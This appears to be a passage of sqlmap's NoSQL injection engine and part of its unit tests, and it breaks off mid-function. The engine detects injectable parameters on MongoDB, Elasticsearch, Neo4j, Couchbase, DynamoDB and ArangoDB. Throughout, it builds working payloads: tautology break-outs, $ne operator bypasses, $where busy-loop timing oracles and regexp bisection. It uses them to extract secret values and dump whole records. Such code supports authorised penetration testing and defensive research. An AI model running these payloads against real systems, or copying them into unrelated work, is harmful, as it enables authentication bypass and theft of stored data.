def _fingerprintLucene(place, parameter):
    """Tells Solr / OpenSearch / Elasticsearch apart by the wording of the error provoked with an
    invalid regexp ('/[/'); Elasticsearch is the default"""
    page = _fetchValue(place, parameter, "/[/").lower()  # invalid regexp -> engine error

    if "solr" in page or "solrexception" in page:
        return "Solr"
    if "opensearch" in page:
        return "OpenSearch"
    return "Elasticsearch"
def _constraint(place, parameter, eq='=', conj=" AND ", prefix="u."):
    """Re-expresses sibling parameters as query constraints (field == parameter name) so extraction
    stays bound to the originally matched record. `prefix`/`eq`/`conj` adapt the per-dialect syntax
    (Cypher: 'u.'/'='/' AND '; AQL: 'u.'/'=='/' && '; $where JS: 'this.'/'=='/'&&'). The result ends
    with a trailing `conj` (ready to be followed by another condition), or is '' with no siblings"""
    clauses = []

    for segment in conf.parameters[place].split(_delim(place)):
        name, separator, value = segment.partition('=')
        name = name.strip()

        # skip valueless segments, nameless ones and the injected parameter itself
        if not separator or not name or name == parameter:
            continue

        clauses.append("%s%s%s'%s'" % (prefix, name, eq, value))

    if not clauses:
        return ""

    return conj.join(clauses) + conj
def _confirm(place, parameter, truePayload, falsePayload):
    """True when the given true/false payload pair produces a stable content divergence"""
    # used to disambiguate dialects that share the same break-out syntax, by probing a
    # dialect-specific primitive (e.g. Cypher '=~' vs N1QL 'REGEXP_CONTAINS')
    def sendTrue():
        return _fetchValue(place, parameter, truePayload)

    def sendFalse():
        return _fetchValue(place, parameter, falsePayload)

    template = _boolean(sendTrue, sendFalse)
    return template is not None
def _timed(call):
    """Invokes the zero-argument `call` and returns the wall-clock seconds it took (its result is dropped)"""
    began = time.time()
    call()
    finished = time.time()
    return finished - began
def _whereDelay(condition):
    """Builds the MongoDB $where (server-side JS) string break-out payload that busy-loops for
    conf.timeSec seconds (expressed in milliseconds) whenever the per-document JS `condition` holds"""
    # yields a timing oracle when no content differential exists. The document is passed in as `d`
    # (inside the function `this` is not the document)
    delayMs = int(conf.timeSec * 1000)
    return "%s' || (function(d){if(%s){var t=new Date().getTime();while(new Date().getTime()-t<%d){}}return false})(this) || '1'=='2" % (NOSQL_SENTINEL, condition, delayMs)
def _detectWhere(place, parameter):
    """Time-based $where probe. Returns the timing threshold (baseline + half of conf.timeSec) when an
    unconditional-delay payload exceeds it while a non-delaying one does not, else None"""
    threshold = _timed(lambda: _fetchValue(place, parameter, _originalValue(place, parameter) or "1")) + conf.timeSec * 0.5

    # a baseline this slow leaves no room to tell a delayed response from a normal one
    if threshold >= conf.timeSec:
        return None

    if _timed(lambda: _fetchValue(place, parameter, _whereDelay("true"))) <= threshold:
        return None

    # the non-delaying control guards against a uniformly slow endpoint
    if _timed(lambda: _fetchValue(place, parameter, "%s' || '1'=='2" % NOSQL_SENTINEL)) > threshold:
        return None

    return threshold
def _jsString(value):
    """Renders `value` as a single-quoted literal, backslash-escaping backslashes and single quotes"""
    escaped = value.replace("\\", "\\\\")  # backslashes first, so the quote escapes are not doubled
    escaped = escaped.replace("'", "\\'")
    return "'%s'" % escaped
def _whereField(place, parameter, bound, expr, threshold):
    """Time-based recovery of an arbitrary per-document JavaScript string expression `expr` (e.g. a key
    name 'Object.keys(d)[i]', or a value 'String(d[name])') via the $where busy-loop oracle. `bound` is
    prepended verbatim to each JS condition; a response slower than `threshold` counts as true"""
    def isSlow(payload):
        return _timed(lambda: _fetchValue(place, parameter, payload)) > threshold

    def lengthPayload(n):
        return _whereDelay("%s(%s)&&(%s).length>=%d" % (bound, expr, expr, n))

    def charPayload(known, klass):
        return _whereDelay("%s/^%s%s/.test(%s)" % (bound, _javaEscape(known), klass, expr))

    return _extract(None, None, lengthPayload, charPayload, isSlow)
def _whereDump(place, parameter, bound, threshold):
    """Whole-document dump via server-side-JavaScript key enumeration: walk Object.keys(d) to recover
    each field name (at most NOSQL_MAX_FIELDS, stopping at the first empty name), then String(d[name])
    for its value. Returns (columns, [values]) - a single row - or None when no field was recovered"""
    fields = []

    for position in xrange(NOSQL_MAX_FIELDS):
        name = _whereField(place, parameter, bound, "Object.keys(d)[%d]" % position, threshold)
        if not name:
            break

        value = _whereField(place, parameter, bound, "String(d[%s])" % _jsString(name), threshold) or ""
        fields.append((name, value))
        logger.info("retrieved: %s='%s'" % (name, value))

    if not fields:
        return None

    return [name for name, _ in fields], [[value for _, value in fields]]
def _classChar(ordinal):
    """Character for codepoint `ordinal`, backslash-escaped when it is a char-class metacharacter
    (']', '\\', '^' or '-')"""
    char = chr(ordinal)
    if char in "]\\^-":
        return "\\" + char
    return char
def _klass(low, high):
    """Regexp character class spanning the codepoints [low, high] (single member when low == high)"""
    if low == high:
        return "[%s]" % _classChar(low)
    return "[%s-%s]" % (_classChar(low), _classChar(high))
def _propLiteral(name):
    """Renders `name` as a single-quoted literal, backslash-escaping backslashes and single quotes"""
    escaped = "".join(("\\" + char) if char in ("\\", "'") else char for char in name)
    return "'%s'" % escaped
def _enumField(place, parameter, template, payloadFor):
    """Content-based recovery of the string matched by a regexp clause built via payloadFor(regexBody),
    reusing the bisection extractor against the always-true single-record `template`"""
    def fetch(value):
        return _fetchValue(place, parameter, value)

    def lengthPayload(n):
        return payloadFor(".{%d,}" % n)

    def charPayload(known, klass):
        # escaped prefix + candidate class, with backslashes doubled for the string literal
        return payloadFor(_quoted(_javaEscape(known) + klass))

    return _extract(template, fetch, lengthPayload, charPayload)
def _enumDump(place, parameter, makePayload, keysExpr, valueExpr):
    """Whole-document dump via key enumeration for the regexp dialects: keysExpr(i) -> the i-th field
    name, valueExpr(name) -> that field's value. makePayload(targetExpr, regexBody) wraps the dialect
    break-out and record binding around a '<targetExpr> matches ^<regexBody>' oracle. Returns
    (columns, rows) or None - the caller can then fall back to single-field extraction"""
    # the bound single record: the page obtained when the first key matches anything
    template = _fetchValue(place, parameter, makePayload(keysExpr(0), ".*"))
    if not template or _isError(template):
        return None

    fields = []
    for position in xrange(NOSQL_MAX_FIELDS):
        # defaults (i=..., n=...) pin the current loop values inside the lambdas
        name = _enumField(place, parameter, template, lambda rb, i=position: makePayload(keysExpr(i), rb))
        if not name:
            break

        value = _enumField(place, parameter, template, lambda rb, n=name: makePayload(valueExpr(n), rb)) or ""
        fields.append((name, value))
        logger.info("retrieved: %s='%s'" % (name, value))

    if not fields:
        return None

    return [name for name, _ in fields], [[value for _, value in fields]]
def _cypherDump(place, parameter):
    """Blind multi-record collection dump (Neo4j Cypher). Walks every matched node in ascending order
    of its internal node id (a unique, ordered, always-present key - unlike property order, which Neo4j
    does not guarantee), key-enumerating each node's full document through _enumDump(). Returns
    (columns, rows), with rows aligned to the union of all field names, or None"""

    fetch = lambda payload: _fetchValue(place, parameter, payload)
    noMatch = fetch("%s' OR '1'='2" % NOSQL_SENTINEL)  # stable zero-record baseline (app closes the quote)
    differs = lambda payload: _ratio(fetch(payload), noMatch) < UPPER_RATIO_BOUND

    # the always-true payload has to diverge from the baseline, otherwise there is no usable oracle
    if not noMatch or not differs("%s' OR '1'='1" % NOSQL_SENTINEL):
        return None

    # a numeric condition opens no string, so balance the app's trailing quote with a tautology
    exists = lambda cond: differs("%s' OR %s AND '1'='1" % (NOSQL_SENTINEL, cond))

    def minIdGreater(lower):
        # smallest internal node id strictly greater than `lower` (None when no further node exists)
        if not exists("id(u) > %d" % lower):
            return None

        # gallop on the distance from `lower`, not on the bound itself: the walk starts with
        # lower == -1, where a bound of 0 doubled in place would stay 0 and never terminate
        span = 1
        while not exists("id(u) > %d AND id(u) <= %d" % (lower, lower + span)):
            span *= 2
            if span > (1 << 40):
                return None

        # bisect (lo, hi]: no matching id up to `lo`, at least one up to `hi`
        lo, hi = lower, lower + span
        while lo + 1 < hi:
            mid = (lo + hi) // 2
            if exists("id(u) > %d AND id(u) <= %d" % (lower, mid)):
                hi = mid
            else:
                lo = mid

        return hi

    columns, records, lastId = [], [], -1

    for _ in xrange(NOSQL_MAX_RECORDS):
        nodeId = minIdGreater(lastId)
        if nodeId is None:
            break

        record = _enumDump(place, parameter,
            lambda expr, rb, k=nodeId: "%s' OR id(u)=%d AND %s =~ '^%s.*" % (NOSQL_SENTINEL, k, expr, rb),
            lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))

        if record:
            cols, values = record
            records.append(dict(zip(cols, values[0])))  # align by field name (keys(u) order is per-node)
            columns.extend(_ for _ in cols if _ not in columns)

        # advance even when this node could not be dumped, so the walk never revisits it
        lastId = nodeId

    return (columns, [[row.get(_, "") for _ in columns] for row in records]) if records else None
def _partiqlValue(place, parameter, bind, field):
    """Blind extraction of `field` for the bound record on a DynamoDB PartiQL point. With no regexp
    available, each character comes from an ordered string comparison (field >= 'prefix'+char)
    bisected over NOSQL_CHAR_MIN..NOSQL_CHAR_MAX. Returns the recovered value, or None when the
    reference request fails or nothing is recovered"""

    def render(prefix):
        # "<field> >= '<prefix>" with the literal left open; a single quote inside the prefix is
        # doubled (PartiQL escaping)
        return "%s' OR %s%s >= '%s" % (NOSQL_SENTINEL, bind, field, prefix.replace("'", "''"))

    # field >= '' -> the bound record matches: the reference page for the comparisons
    template = _fetchValue(place, parameter, render(""))

    if not template or _isError(template):
        return None

    def holds(prefix):
        page = _fetchValue(place, parameter, render(prefix))
        return _ratio(page, template) > UPPER_RATIO_BOUND

    recovered = ""

    while len(recovered) < NOSQL_MAX_LENGTH:
        # not even the lowest candidate compares below the field -> end of value
        if not holds(recovered + chr(NOSQL_CHAR_MIN)):
            break

        # upper-biased bisection for the greatest character that still satisfies the comparison
        floor, ceiling = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
        while floor < ceiling:
            pivot = (floor + ceiling + 1) // 2
            if holds(recovered + chr(pivot)):
                floor = pivot
            else:
                ceiling = pivot - 1

        recovered += chr(floor)

    return recovered or None
def _partiqlDump(place, parameter, key):
    """DynamoDB PartiQL dump: comparison-extracts the injected field `key`, with the record pinned by
    the constraint built from sibling parameters. Returns ([key], [[value]]) or None"""

    bind = _constraint(place, parameter, "=", " AND ", prefix="")

    if bind:  # without a sibling constraint no single record can be pinned
        value = _partiqlValue(place, parameter, bind, key)
        if value is not None:
            return ([key], [[value]])

    return None
def _extract(template, fetchFn, lengthValue, charValue, truthFn=None):
    """Blind value recovery: finds the length (doubling, then bisection) and afterwards bisects each
    character's codepoint over NOSQL_CHAR_MIN..NOSQL_CHAR_MAX with regexp character-class ranges.
    lengthValue(n) and charValue(known, charClass) render the dialect payloads. A payload counts as
    true when `truthFn(payload)` says so or, without a truthFn, when the page from fetchFn(payload)
    is similar enough to `template`. Returns the value, or None when the length is zero"""

    if truthFn:
        truth = truthFn
    else:
        def truth(value):
            return _ratio(fetchFn(value), template) > UPPER_RATIO_BOUND

    # length, step 1: keep doubling the probe while "at least <probe> characters" holds
    confirmed = 0
    probe = 1
    while probe <= NOSQL_MAX_LENGTH and truth(lengthValue(probe)):
        confirmed = probe
        probe *= 2

    # length, step 2: bisect between the last confirmed length and the first one not confirmed
    low = confirmed
    high = min(probe, NOSQL_MAX_LENGTH + 1)
    while high - low > 1:
        mid = (low + high) // 2
        if truth(lengthValue(mid)):
            low = mid
        else:
            high = mid

    if low == 0:
        return None

    logger.debug("retrieving the value (%d characters)" % low)

    retVal = ""

    for _ in xrange(low):
        lo, hi = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX

        if truth(charValue(retVal, _klass(lo, hi))):
            # lower-biased bisection: shrink [lo, hi] until a single codepoint is left
            while lo < hi:
                mid = (lo + hi) // 2
                if truth(charValue(retVal, _klass(lo, mid))):
                    hi = mid
                else:
                    lo = mid + 1
            retVal += chr(lo)
        else:
            # character outside the searched range; NOTE(review): the placeholder becomes part of
            # the known prefix handed to charValue() for all the remaining positions
            retVal += '?'

    return retVal
def _resolve(place, parameter, key):
    """Runs the dialect probes one after another and builds a Vector for the first one that detects,
    fixing both the reported back-end and the payload builders used for extraction. Vectors created
    with None for the fetch/length/character callables offer no blind single-value extraction (some
    of them still carry a `dump` callable). Returns None when no probe succeeds"""

    field = "u.%s" % key

    def fetchValue(value):
        # plain value injection - the request primitive shared by the content-based vectors
        return _fetchValue(place, parameter, value)

    # --- operator injection (always-true via $ne, extraction via $regex)
    template = _detectMongo(place, parameter)
    if template:
        def fetchRegex(value):
            return _fetch(place, parameter, "$regex", value)

        return Vector(_fingerprintMongo(place, parameter), fetchRegex,
            lambda n: "^.{%d,}$" % n,
            lambda known, klass: "^%s%s" % (re.escape(known), klass),
            template=template, bypass='{"$ne": null}')

    # --- Lucene query_string
    template = _detectES(place, parameter)
    if template:
        return Vector(_fingerprintLucene(place, parameter), fetchValue,
            lambda n: "/.{%d,}/" % n,
            lambda known, klass: "/%s%s.*/" % (_lucene(known), klass),
            template=template, bypass='*')

    # --- ' OR '1'='1 string break-out family
    template = _detectCypher(place, parameter)
    if template:
        constraint = _constraint(place, parameter)

        # Neo4j Cypher, Couchbase N1QL and DynamoDB PartiQL all share the ' OR '1'='1 break-out; tell
        # them apart by the regexp/string primitive the back-end honors ('=~', 'REGEXP_CONTAINS', or
        # PartiQL 'begins_with')
        honorsCypherRegexp = _confirm(place, parameter,
            "%s' OR %s%s =~ '.*" % (NOSQL_SENTINEL, constraint, field),
            "%s' OR %s%s =~ '%s" % (NOSQL_SENTINEL, constraint, field, NOSQL_SENTINEL))

        if not honorsCypherRegexp:
            if _confirm(place, parameter,
                    "%s' OR REGEXP_CONTAINS(%s, '.*') OR '1'='2" % (NOSQL_SENTINEL, field),
                    "%s' OR REGEXP_CONTAINS(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, field, NOSQL_SENTINEL)):
                def couchbaseDump():
                    return _enumDump(place, parameter,
                        lambda expr, rb: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, expr, rb),
                        lambda i: "OBJECT_NAMES(u)[%d]" % i,
                        lambda n: "TOSTRING(u[%s])" % _propLiteral(n))

                return Vector("Couchbase", fetchValue,
                    lambda n: "%s' OR REGEXP_CONTAINS(%s, '^.{%d,}') OR '1'='2" % (NOSQL_SENTINEL, field, n),
                    lambda known, klass: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, field, _quoted(_javaEscape(known) + klass)),
                    template=template, bypass="' OR '1'='1", dump=couchbaseDump)

            if _confirm(place, parameter,
                    "%s' OR begins_with(%s, '') OR '1'='2" % (NOSQL_SENTINEL, key),
                    "%s' OR begins_with(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, key, NOSQL_SENTINEL)):
                def dynamoDump():
                    return _partiqlDump(place, parameter, key)

                return Vector("DynamoDB", None, None, None, template=template, bypass="' OR '1'='1",
                    dump=dynamoDump)

        def neo4jDump():
            # multi-record walk first, the single constraint-bound record as the fallback
            return _cypherDump(place, parameter) or _enumDump(place, parameter,
                lambda expr, rb: "%s' OR %s%s =~ '^%s.*" % (NOSQL_SENTINEL, constraint, expr, rb),
                lambda i: "keys(u)[%d]" % i,
                lambda n: "toString(u[%s])" % _propLiteral(n))

        # reached both when '=~' is honored and when none of the other primitives confirmed
        return Vector("Neo4j", None, None, None, template=template, bypass="' OR '1'='1",
            dump=neo4jDump)

    # --- ' || '1'=='1 string break-out family
    template = _detectAQL(place, parameter)
    if template:
        constraint = _constraint(place, parameter, "==", " && ")

        # ArangoDB AQL and MongoDB $where (server-side JavaScript) both satisfy the ' || '1'=='1
        # break-out; tell them apart by which regexp-match primitive holds - AQL '=~' or a JS /re/.test()
        honorsAqlRegexp = _confirm(place, parameter,
            "%s' || ('x' =~ '.') || '1'=='2" % NOSQL_SENTINEL,
            "%s' || ('x' =~ 'y') || '1'=='2" % NOSQL_SENTINEL)

        if not honorsAqlRegexp and _confirm(place, parameter,
                "%s' || /./.test('x') || '1'=='2" % NOSQL_SENTINEL,
                "%s' || /y/.test('x') || '1'=='2" % NOSQL_SENTINEL):
            bound = _constraint(place, parameter, "==", "&&", prefix="this.")
            whereTemplate = _fetchValue(place, parameter, "%s' || (%sthis.%s) || '1'=='2" % (NOSQL_SENTINEL, bound, key))

            return Vector("MongoDB ($where)", fetchValue,
                lambda n: "%s' || (%sthis.%s&&this.%s.length>=%d) || '1'=='2" % (NOSQL_SENTINEL, bound, key, key, n),
                lambda known, klass: "%s' || (%sthis.%s&&/^%s%s/.test(this.%s)) || '1'=='2" % (NOSQL_SENTINEL, bound, key, _javaEscape(known), klass, key),
                template=whereTemplate, bypass="' || '1'=='1")

        def arangoDump():
            return _enumDump(place, parameter,
                lambda expr, rb: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, expr, rb),
                lambda i: "ATTRIBUTES(u)[%d]" % i,
                lambda n: "TO_STRING(u[%s])" % _propLiteral(n))

        return Vector("ArangoDB", fetchValue,
            lambda n: "%s' || (%s%s =~ '^.{%d,}') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, n),
            lambda known, klass: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, _quoted(_javaEscape(known) + klass)),
            template=template, bypass="' || '1'=='1", dump=arangoDump)

    # --- numeric (unquoted) context
    numeric = _detectNumeric(place, parameter)
    if numeric:
        dbms, template, bypass = numeric
        dump = None

        if dbms == "Neo4j":  # bind the dump to the injected numeric field (e.g. u.id = 1)
            value = (_originalValue(place, parameter) or "1").strip()

            def dump():
                return _enumDump(place, parameter,
                    lambda expr, rb: "%s AND (%s =~ '^%s.*')" % (value, expr, rb),
                    lambda i: "keys(u)[%d]" % i,
                    lambda n: "toString(u[%s])" % _propLiteral(n))

        return Vector(dbms, None, None, None, template=template, bypass=bypass, dump=dump)

    # --- $where probe yielding a threshold: no template, only the dump is wired
    threshold = _detectWhere(place, parameter)
    if threshold is not None:
        bound = _constraint(place, parameter, "==", "&&", prefix="d.")

        def whereDump():
            return _whereDump(place, parameter, bound, threshold)

        return Vector("MongoDB ($where)", None, None, None, dump=whereDump)

    # --- error-based (detection only)
    engine = _detectError(place, parameter)
    if engine:
        return Vector(engine, None, None, None)

    return None
def _inband(place, parameter, template):
    """In-band data exposure gate: hands back the always-true response `template` when it is longer
    than the response to the original value (or "1" when there is none), differs from it materially
    and does not match NOSQL_ERROR_REGEX - i.e. the injection returns extra records directly.
    Returns None otherwise"""

    baseline = _originalValue(place, parameter) or "1"
    original = _fetchValue(place, parameter, baseline)

    exposed = (template
        and len(template) > len(original)
        and _ratio(template, original) < UPPER_RATIO_BOUND
        and not re.search(NOSQL_ERROR_REGEX, template))

    if exposed:
        return template

    return None
def _clean(cell):
cell = re.sub(r"(?s)<[^>]+>", "", cell)
for entity, char in (("&amp;", '&'), ("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&#39;", "'"), ("&apos;", "'")):
cell = cell.replace(entity, char)
return re.sub(r"\s+", " ", cell).strip()
def _records(page):
"""Parses structured records out of a reflected response - a JSON array of objects or an HTML
table - returning (columns, rows) for a tabular dump, else None"""
try:
data = json.loads(page, object_pairs_hook=OrderedDict)
rows = data if isinstance(data, list) else next((_ for _ in data.values() if isinstance(_, list)), None) if isinstance(data, dict) else None
rows = [_ for _ in (rows or []) if isinstance(_, dict)]
if rows:
columns = []
for row in rows:
columns.extend(_ for _ in row if _ not in columns)
return columns, [[("NULL" if row[_] is None else _clean("%s" % row[_])) if _ in row else "" for _ in columns] for row in rows]
except (ValueError, TypeError):
pass
for body in re.findall(r"(?is)<table[^>]*>(.*?)</table>", page or ""):
header, rows = None, []
for index, tr in enumerate(re.findall(r"(?is)<tr[^>]*>(.*?)</tr>", body)):
cells = re.findall(r"(?is)<t[dh][^>]*>(.*?)</t[dh]>", tr)
if index == 0 and re.search(r"(?i)<th[\s>]", tr):
header = [_clean(_) for _ in cells]
elif cells:
rows.append([_clean(_) for _ in cells])
if rows:
width = max(len(_) for _ in rows)
columns = header if header and len(header) == width else ["column_%d" % (_ + 1) for _ in xrange(width)]
return columns, [row + [""] * (width - len(row)) for row in rows]
return None
def _grid(columns, rows):
"""Renders (columns, rows) as a sqlmap-style ASCII table"""
widths = [max([len(columns[index])] + [len(row[index]) for row in rows if index < len(row)]) for index in xrange(len(columns))]
separator = '+' + '+'.join('-' * (width + 2) for width in widths) + '+'
line = lambda cells: "| " + " | ".join((cells[index] if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"
return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])
def _dumpInband(place, key, page):
    """Outputs in-band records through conf.dumper: as a table when _records() can parse the page,
    otherwise as tag-stripped, whitespace-collapsed text cut to NOSQL_DUMP_LIMIT characters"""

    parsed = _records(page)

    if not parsed:
        stripped = re.sub(r"(?s)<[^>]+>", " ", page)
        text = re.sub(r"\s+", " ", stripped).strip()
        conf.dumper.singleString("NoSQL: %s parameter '%s' in-band data: %s" % (place, key, text[:NOSQL_DUMP_LIMIT]))
        return

    columns, rows = parsed
    conf.dumper.singleString("NoSQL: %s parameter '%s' in-band records [%d]:\n%s" % (place, key, len(rows), _grid(columns, rows)))
def nosqlScan():
    """Entry point for '--nosql': detects NoSQL injection (MongoDB/CouchDB operator, Lucene
    query_string, Cypher/N1QL/AQL string break-out, MongoDB $where time-based, or error-based) on
    every eligible parameter. For each confirmed point it reports the vector and then tries the
    whole-document dump (when the vector has one), the in-band records exposed by the always-true
    payload (when nothing was dumped yet) and the blind recovery of the targeted field"""

    global NOSQL_SENTINEL
    NOSQL_SENTINEL = randomStr(length=10, lowercase=True)  # fresh marker for this run

    # NoSQL injection from an application-scoped point is confined to the back-end's single query
    # (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
    # SQL database/table/user/banner enumeration, so those switches do not apply here
    logger.info("".join((
        "'--nosql' is self-contained: it confirms the injection and dumps the reachable ",
        "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, ",
        "--users, --sql-query) do not map to a NoSQL back-end and are ignored",
    )))

    tested = 0
    found = 0

    for place in NOSQL_PLACES:
        if place not in conf.paramDict:
            continue

        for parameter in list(conf.paramDict[place].keys()):
            key = _jsonKey(parameter)

            # honor the parameter filter (matching either the key or the raw parameter name)
            if conf.testParameter and key not in conf.testParameter and parameter not in conf.testParameter:
                continue

            tested += 1
            logger.info("testing NoSQL injection on %s parameter '%s'" % (place, key))

            vector = _resolve(place, parameter, key)
            if not vector:
                continue

            found += 1
            logger.info("%s parameter '%s' is vulnerable to NoSQL injection (back-end: '%s')" % (place, key, vector.dbms))

            # standard sqlmap-style injection-point summary (reproducible vector)
            bypass = vector.bypass
            if bypass == '{"$ne": null}':
                title = "operator injection"
                payload = "%s[$ne]=%s" % (key, NOSQL_SENTINEL)
            elif bypass == '*':
                title = "Lucene query_string injection"
                payload = "%s=*" % key
            elif bypass:
                context = "numeric" if bypass[:1].isdigit() else "string"
                title = "boolean-based blind (%s)" % context
                payload = "%s=%s" % (key, bypass)
            elif vector.dump is not None:
                title = "time-based blind (server-side JavaScript $where)"
                payload = "%s=' || (sleep loop) || '" % key
            else:
                title = "error-based"
                payload = "%s=%s'" % (key, _originalValue(place, parameter) or "1")

            conf.dumper.singleString("---\nParameter: %s (%s)\n    Type: NoSQL injection\n    Title: %s %s\n    Payload: %s\n---" % (key, place, vector.dbms, title, payload))

            if bypass:
                logger.info("%s parameter '%s' can be coerced always-true with '%s' (e.g. authentication/filter bypass)" % (place, key, bypass))

            dumped = False

            # a named whole-document dump is preferred over the unnamed in-band table
            if vector.dump is not None:
                logger.info("retrieving the reachable document(s)")
                records = vector.dump()

                if records:
                    columns, rows = records
                    logger.info("dumped %d record%s (%d field%s)" % (len(rows), 's' if len(rows) != 1 else '', len(columns), 's' if len(columns) != 1 else ''))
                    conf.dumper.singleString("NoSQL: %s parameter '%s' %s:\n%s" % (place, key, "documents" if len(rows) != 1 else "document", _grid(columns, rows)))
                    dumped = True

            if not dumped and vector.template is not None:
                exposure = _inband(place, parameter, vector.template)

                if exposure:
                    logger.info("the always-true payload returns additional records (in-band data exposure)")
                    _dumpInband(place, key, exposure)
                    dumped = True

            # blind recovery of the targeted field, for the vectors that carry payload builders
            if vector.lengthValue is not None:
                value = _extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)

                if value is not None:
                    conf.dumper.singleString("NoSQL: %s parameter '%s' -> %s" % (place, key, repr(value)))
                    dumped = True

            if dumped:
                continue

            if vector.template is None and vector.truth is None and vector.dump is None:
                warnMsg = "injection is detection-only for back-end '%s' (no extraction oracle for this engine)" % vector.dbms
            else:
                warnMsg = "injection on '%s' is confirmed but yielded no data here: this point exposes only a boolean oracle on a non-extractable (e.g. numeric) field. Target a string-compared parameter (e.g. a login/search field) to blindly read a value" % key

            logger.warning(warnMsg)

    if not found:
        logger.warning("no parameter appears to be injectable via NoSQL injection (%d tested)" % tested)

650
tests/test_nosql.py Normal file
View file

@ -0,0 +1,650 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Offline, deterministic tests for the NoSQL injection engine. Mock oracles stand in for the
HTTP/back-end layer so detection and blind extraction can be exercised without a live target,
covering each dialect: MongoDB/CouchDB operator injection, Elasticsearch/Solr query_string,
Neo4j Cypher and ArangoDB AQL string break-out.
"""
import re
import unittest
from _testutils import bootstrap
bootstrap()
import lib.techniques.nosql.inject as ni
# the value the mock oracles match payloads against and the extraction tests expect back
SECRET = "S3cr3t_9"
# canned response bodies the mock oracles return for a matching / non-matching payload
MATCH = "<html><body>Welcome user; rows: alpha, bravo, charlie</body></html>"
NOMATCH = "<html><body>Invalid credentials; no rows</body></html>"
def _mongo(place, parameter, op, value, isArray=False):
    """Mock operator-injection oracle: '$ne' always matches, '$in' never does and '$regex' matches
    when the pattern matches SECRET from its start (an invalid pattern yields an error page). Any
    other operator returns an empty response"""

    if op == "$regex":
        try:
            matched = re.match(value, SECRET) is not None
        except re.error:
            return "<html><body>error: invalid regular expression</body></html>"
        return MATCH if matched else NOMATCH

    if op == "$ne":
        return MATCH

    if op == "$in":
        return NOMATCH

    return ""
def _es(place, parameter, value):
    """Mock query_string oracle: '*' matches, the sentinel does not, and a /regexp/ value matches when
    it covers SECRET entirely (an invalid pattern yields an error page). Anything else: no match"""

    if value == "*":
        return MATCH

    if value == ni.NOSQL_SENTINEL:
        return NOMATCH

    if not (value.startswith("/") and value.endswith("/")):
        return NOMATCH

    # Lucene regexp is full-anchored
    try:
        matched = re.match("^(?:%s)$" % value[1:-1], SECRET) is not None
    except re.error:
        return "<html><body>error: parse_exception</body></html>"

    return MATCH if matched else NOMATCH
class TestNoSqlMongo(unittest.TestCase):
    """Operator-injection detection and blind extraction against the _mongo() oracle"""

    def setUp(self):
        self._savedFetch = ni._fetch
        ni._fetch = _mongo

    def tearDown(self):
        ni._fetch = self._savedFetch

    def test_detect(self):
        detected = ni._detectMongo("GET", "password")
        self.assertTrue(detected)

    def test_extract(self):
        def fetchFn(v):
            return ni._fetch("GET", "password", "$regex", v)

        def lengthValue(n):
            return "^.{%d,}$" % n

        def charValue(known, klass):
            return "^" + re.escape(known) + klass

        # the always-true ($ne) response serves as the comparison template
        template = ni._fetch("GET", "password", "$ne", ni.NOSQL_SENTINEL)
        value = ni._extract(template, fetchFn, lengthValue, charValue)

        self.assertEqual(value, SECRET)

    def test_not_injectable(self):
        # an endpoint answering the same for every operator must not be flagged
        ni._fetch = lambda *args, **kwargs: MATCH
        self.assertIsNone(ni._detectMongo("GET", "password"))
class TestNoSqlElasticsearch(unittest.TestCase):
    """query_string detection and blind extraction against the _es() oracle"""

    def setUp(self):
        self._savedFetchValue = ni._fetchValue
        ni._fetchValue = _es

    def tearDown(self):
        ni._fetchValue = self._savedFetchValue

    def test_detect(self):
        detected = ni._detectES("GET", "q")
        self.assertTrue(detected)

    def test_extract(self):
        def fetchFn(v):
            return ni._fetchValue("GET", "q", v)

        def lengthValue(n):
            return "/.{%d,}/" % n

        def charValue(known, klass):
            return "/%s%s.*/" % (ni._lucene(known), klass)

        # the match-all ('*') response serves as the comparison template
        template = ni._fetchValue("GET", "q", "*")
        value = ni._extract(template, fetchFn, lengthValue, charValue)

        self.assertEqual(value, SECRET)

    def test_not_injectable(self):
        # an endpoint answering the same for every value must not be flagged
        ni._fetchValue = lambda *args, **kwargs: MATCH
        self.assertIsNone(ni._detectES("GET", "q"))
def _cypher(place, parameter, value):
    """Mock Cypher string-context oracle: the '1'='1 / '1'='2 tautologies decide first; otherwise the
    regexp body following "=~ '^" has to cover SECRET entirely for a match"""

    for marker, page in (("'1'='1", MATCH), ("'1'='2", NOMATCH)):
        if marker in value:
            return page

    found = re.search(r"=~ '\^(.*)$", value)  # the regex body after the =~ operator
    if not found:
        return NOMATCH

    try:
        matched = re.match("^(?:%s)$" % found.group(1), SECRET) is not None
    except re.error:
        return NOMATCH

    return MATCH if matched else NOMATCH
class TestNoSqlCypher(unittest.TestCase):
    """Cypher string break-out detection and blind extraction against the _cypher() oracle"""

    def setUp(self):
        self._savedFetchValue = ni._fetchValue
        ni._fetchValue = _cypher

    def tearDown(self):
        ni._fetchValue = self._savedFetchValue

    def test_detect(self):
        detected = ni._detectCypher("GET", "password")
        self.assertTrue(detected)

    def test_extract(self):
        def fetchFn(v):
            return ni._fetchValue("GET", "password", v)

        def lengthValue(n):
            return "%s' OR u.password =~ '^.{%d,}" % (ni.NOSQL_SENTINEL, n)

        def charValue(known, klass):
            return "%s' OR u.password =~ '^%s%s.*" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass)

        # the always-true break-out response serves as the comparison template
        template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' OR '1'='1")
        value = ni._extract(template, fetchFn, lengthValue, charValue)

        self.assertEqual(value, SECRET)
def _aql(place, parameter, value):
